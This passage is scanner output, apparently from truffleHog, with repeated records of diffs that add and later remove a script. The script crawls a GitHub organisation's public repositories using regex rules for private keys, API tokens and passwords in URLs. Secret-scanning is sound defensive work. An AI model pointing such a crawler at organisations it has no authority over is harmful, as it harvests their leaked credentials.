"origin/dev", "commit": "typo", "commitHash": "fc24b2567fb71e51345b3f611ed6eeb815440407", "date": "2018-12-07 00:27:58", "diff": "@@ -4,6 +4,32 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n+import re\n+from json import loads, dumps\n+\n+rules = {\n+ \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n+ \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n+ \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n+ \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n+ \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n+ \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n+ \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n+ \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n+ \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n+ \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n+ \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n+ \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n+ \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n+ \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n+ \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n+ \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n+}\n+\n+for key in rules:\n+ rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -11,8 +37,16 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n- if item['private'] == False:\n+\n+ if item['fork'] == False and reached:\n print('searching ' + item[\"html_url\"])\n- truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n+ results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n+ for issue in results[\"foundIssues\"]:\n+ d = loads(open(issue).read())\n+ d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n+ d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n+ d['diff'] = d['diff'][0:200]\n+ d['printDiff'] = d['printDiff'][0:200]\n+ print(dumps(d, indent=4))\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"twitter\", 1)\n+get_org_repos(\"square\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN RSA PRIVATE KEY-----\u001b[0m", "reason": "RSA private key", "stringsFound": ["-----BEGIN RSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "typo", "commitHash": "fc24b2567fb71e51345b3f611ed6eeb815440407", "date": "2018-12-07 00:27:58", "diff": "@@ -4,6 +4,32 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n+import re\n+from json import loads, dumps\n+\n+rules = {\n+ \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n+ \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n+ \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n+ \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n+ \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n+ \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n+ \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n+ \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n+ \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n+ \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n+ \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n+ \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n+ \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n+ \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n+ \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n+ \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n+}\n+\n+for key in rules:\n+ rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -11,8 +37,16 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n- if item['private'] == False:\n+\n+ if item['fork'] == False and reached:\n print('searching ' + item[\"html_url\"])\n- truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n+ results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n+ for issue in results[\"foundIssues\"]:\n+ d = loads(open(issue).read())\n+ d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n+ d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n+ d['diff'] = d['diff'][0:200]\n+ d['printDiff'] = d['printDiff'][0:200]\n+ print(dumps(d, indent=4))\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"twitter\", 1)\n+get_org_repos(\"square\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN OPENSSH PRIVATE KEY-----\u001b[0m", "reason": "SSH (OPENSSH) private key", "stringsFound": ["-----BEGIN OPENSSH PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "typo", "commitHash": "fc24b2567fb71e51345b3f611ed6eeb815440407", "date": "2018-12-07 00:27:58", "diff": "@@ -4,6 +4,32 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n+import re\n+from json import loads, dumps\n+\n+rules = {\n+ \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n+ \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n+ \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n+ \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n+ \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n+ \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n+ \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n+ \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n+ \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n+ \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n+ \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n+ \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n+ \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n+ \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n+ \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n+ \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n+}\n+\n+for key in rules:\n+ rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -11,8 +37,16 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n- if item['private'] == False:\n+\n+ if item['fork'] == False and reached:\n print('searching ' + item[\"html_url\"])\n- truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n+ results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n+ for issue in results[\"foundIssues\"]:\n+ d = loads(open(issue).read())\n+ d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n+ d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n+ d['diff'] = d['diff'][0:200]\n+ d['printDiff'] = d['printDiff'][0:200]\n+ print(dumps(d, indent=4))\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"twitter\", 1)\n+get_org_repos(\"square\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN DSA PRIVATE KEY-----\u001b[0m", "reason": "SSH (DSA) private key", "stringsFound": ["-----BEGIN DSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "typo", "commitHash": "fc24b2567fb71e51345b3f611ed6eeb815440407", "date": "2018-12-07 00:27:58", "diff": "@@ -4,6 +4,32 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n+import re\n+from json import loads, dumps\n+\n+rules = {\n+ \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n+ \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n+ \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n+ \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n+ \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n+ \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n+ \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n+ \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n+ \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n+ \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n+ \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n+ \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n+ \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n+ \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n+ \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n+ \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n+}\n+\n+for key in rules:\n+ rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -11,8 +37,16 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n- if item['private'] == False:\n+\n+ if item['fork'] == False and reached:\n print('searching ' + item[\"html_url\"])\n- truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n+ results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n+ for issue in results[\"foundIssues\"]:\n+ d = loads(open(issue).read())\n+ d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n+ d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n+ d['diff'] = d['diff'][0:200]\n+ d['printDiff'] = d['printDiff'][0:200]\n+ print(dumps(d, indent=4))\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"twitter\", 1)\n+get_org_repos(\"square\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN EC PRIVATE KEY-----\u001b[0m", "reason": "SSH (EC) private key", "stringsFound": ["-----BEGIN EC PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "typo", "commitHash": "fc24b2567fb71e51345b3f611ed6eeb815440407", "date": "2018-12-07 00:27:58", "diff": "@@ -4,6 +4,32 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n+import re\n+from json import loads, dumps\n+\n+rules = {\n+ \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n+ \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n+ \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n+ \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n+ \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n+ \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n+ \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n+ \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n+ \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n+ \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n+ \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n+ \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n+ \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n+ \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n+ \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n+ \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n+}\n+\n+for key in rules:\n+ rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -11,8 +37,16 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n- if item['private'] == False:\n+\n+ if item['fork'] == False and reached:\n print('searching ' + item[\"html_url\"])\n- truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n+ results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n+ for issue in results[\"foundIssues\"]:\n+ d = loads(open(issue).read())\n+ d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n+ d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n+ d['diff'] = d['diff'][0:200]\n+ d['printDiff'] = d['printDiff'][0:200]\n+ print(dumps(d, indent=4))\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"twitter\", 1)\n+get_org_repos(\"square\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN PGP PRIVATE KEY BLOCK-----\u001b[0m", "reason": "PGP private key block", "stringsFound": ["-----BEGIN PGP PRIVATE KEY BLOCK-----"]} +{"branch": "origin/dev", "commit": "modifying search org\n", "commitHash": "3048c6429d80094b42fd44919e3d6768536178ce", "date": "2018-09-29 18:21:15", "diff": "@@ -4,32 +4,6 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n-import re\n-from json import loads, dumps\n-\n-rules = {\n- \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n- \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n- \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n- \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n- \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n- \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n- \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n- \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n- \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n- \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n- \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n- \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n- \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n- \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n- \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n- \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n-}\n-\n-for key in rules:\n- rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -37,16 +11,8 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n-\n- if item['fork'] == False and reached:\n+ if item['private'] == False:\n print('searching ' + item[\"html_url\"])\n- results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n- for issue in results[\"foundIssues\"]:\n- d = loads(open(issue).read())\n- d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n- d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n- d['diff'] = d['diff'][0:200]\n- d['printDiff'] = d['printDiff'][0:200]\n- print(dumps(d, indent=4))\n+ truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"square\", 1)\n+get_org_repos(\"twitter\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN RSA PRIVATE KEY-----\u001b[0m", "reason": "RSA private key", "stringsFound": ["-----BEGIN RSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "modifying search org\n", "commitHash": "3048c6429d80094b42fd44919e3d6768536178ce", "date": "2018-09-29 18:21:15", "diff": "@@ -4,32 +4,6 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n-import re\n-from json import loads, dumps\n-\n-rules = {\n- \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n- \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n- \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n- \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n- \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n- \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n- \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n- \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n- \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n- \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n- \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n- \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n- \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n- \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n- \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n- \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n-}\n-\n-for key in rules:\n- rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -37,16 +11,8 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n-\n- if item['fork'] == False and reached:\n+ if item['private'] == False:\n print('searching ' + item[\"html_url\"])\n- results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n- for issue in results[\"foundIssues\"]:\n- d = loads(open(issue).read())\n- d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n- d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n- d['diff'] = d['diff'][0:200]\n- d['printDiff'] = d['printDiff'][0:200]\n- print(dumps(d, indent=4))\n+ truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"square\", 1)\n+get_org_repos(\"twitter\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN OPENSSH PRIVATE KEY-----\u001b[0m", "reason": "SSH (OPENSSH) private key", "stringsFound": ["-----BEGIN OPENSSH PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "modifying search org\n", "commitHash": "3048c6429d80094b42fd44919e3d6768536178ce", "date": "2018-09-29 18:21:15", "diff": "@@ -4,32 +4,6 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n-import re\n-from json import loads, dumps\n-\n-rules = {\n- \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n- \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n- \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n- \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n- \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n- \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n- \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n- \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n- \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n- \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n- \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n- \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n- \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Generic API Key\": 